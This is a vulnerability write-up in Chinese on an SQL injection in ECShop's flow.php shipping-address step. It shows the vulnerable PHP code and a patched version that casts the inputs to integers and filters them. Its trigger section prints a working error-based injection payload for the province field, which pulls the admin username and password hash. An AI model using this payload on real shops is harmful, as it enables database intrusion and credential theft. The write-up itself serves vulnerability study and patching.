ecshop /flow.php SQL Injection Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

ECSHOP的配送地址页面网页没有验证地区参数的有效性，存在sql注入漏洞，攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据，造成未授权的数据库操作甚至执行任意代码

Relevant Link:

http://sebug.net/vuldb/ssvid-60554

2. 漏洞触发条件

1. 先注册账户，随便选个商品进购物车，然后填地址，电话等等
2. 把任意商品加入购物车在填写配送地址那一页，有地区选择
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1
//比如省选择安徽
3. 其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
用firefox tamper data改成
localhost province=3‘) and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
4. 就会回显错误页面了 

Relevant Link:

http://www.2cto.com/Article/201212/179861.html

3. 漏洞影响范围
4. 漏洞代码分析

/flow.php

elseif ($_REQUEST[‘step‘] == ‘consignee‘)
{
    ...
    //未对POST数据进行有效过滤
    else
    {
        /*
        * 保存收货人信息
        */
        $consignee = array(
        ‘address_id‘    => empty($_POST[‘address_id‘]) ? 0  : intval($_POST[‘address_id‘]),
        ‘consignee‘     => empty($_POST[‘consignee‘])  ? ‘‘ : trim($_POST[‘consignee‘]),
        ‘country‘       => empty($_POST[‘country‘])    ? ‘‘ : $_POST[‘country‘],
        ‘province‘      => empty($_POST[‘province‘])   ? ‘‘ : $_POST[‘province‘],
        ‘city‘          => empty($_POST[‘city‘])       ? ‘‘ : $_POST[‘city‘],
        ‘district‘      => empty($_POST[‘district‘])   ? ‘‘ : $_POST[‘district‘],
        ‘email‘         => empty($_POST[‘email‘])      ? ‘‘ : $_POST[‘email‘],
        ‘address‘       => empty($_POST[‘address‘])    ? ‘‘ : $_POST[‘address‘],
        ‘zipcode‘       => empty($_POST[‘zipcode‘])    ? ‘‘ : make_semiangle(trim($_POST[‘zipcode‘])),
        ‘tel‘           => empty($_POST[‘tel‘])        ? ‘‘ : make_semiangle(trim($_POST[‘tel‘])),
        ‘mobile‘        => empty($_POST[‘mobile‘])     ? ‘‘ : make_semiangle(trim($_POST[‘mobile‘])),
        ‘sign_building‘ => empty($_POST[‘sign_building‘]) ? ‘‘ : $_POST[‘sign_building‘],
        ‘best_time‘     => empty($_POST[‘best_time‘])  ? ‘‘ : $_POST[‘best_time‘],
        );
        ..

5. 防御方法

/flow.php

elseif ($_REQUEST[‘step‘] == ‘consignee‘)
{
    ...
    else
    {
        /*
        * 保存收货人信息
        */
        $consignee = array(
        /* 对用户输入的POST数据进行有效过滤 */
        ‘address_id‘    => empty($_POST[‘address_id‘]) ? 0  :   intval($_POST[‘address_id‘]),
        ‘consignee‘     => empty($_POST[‘consignee‘])  ? ‘‘ :   compile_str(trim($_POST[‘consignee‘])),
        ‘country‘       => empty($_POST[‘country‘])    ? ‘‘ :   intval($_POST[‘country‘]),
        ‘province‘      => empty($_POST[‘province‘])   ? ‘‘ :   intval($_POST[‘province‘]),
        ‘city‘          => empty($_POST[‘city‘])       ? ‘‘ :   intval($_POST[‘city‘]),
        ‘district‘      => empty($_POST[‘district‘])   ? ‘‘ :   intval($_POST[‘district‘]),
        /* */
        ‘email‘         => empty($_POST[‘email‘])      ? ‘‘ :   compile_str($_POST[‘email‘]),
        ‘address‘       => empty($_POST[‘address‘])    ? ‘‘ :   compile_str($_POST[‘address‘]),
        ‘zipcode‘       => empty($_POST[‘zipcode‘])    ? ‘‘ :   compile_str(make_semiangle(trim($_POST[‘zipcode‘]))),
        ‘tel‘           => empty($_POST[‘tel‘])        ? ‘‘ :   compile_str(make_semiangle(trim($_POST[‘tel‘]))),
        ‘mobile‘        => empty($_POST[‘mobile‘])     ? ‘‘ :   compile_str(make_semiangle(trim($_POST[‘mobile‘]))),
        ‘sign_building‘ => empty($_POST[‘sign_building‘]) ? ‘‘ :compile_str($_POST[‘sign_building‘]),
        ‘best_time‘     => empty($_POST[‘best_time‘])  ? ‘‘ :   compile_str($_POST[‘best_time‘]),
    );
    ..

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved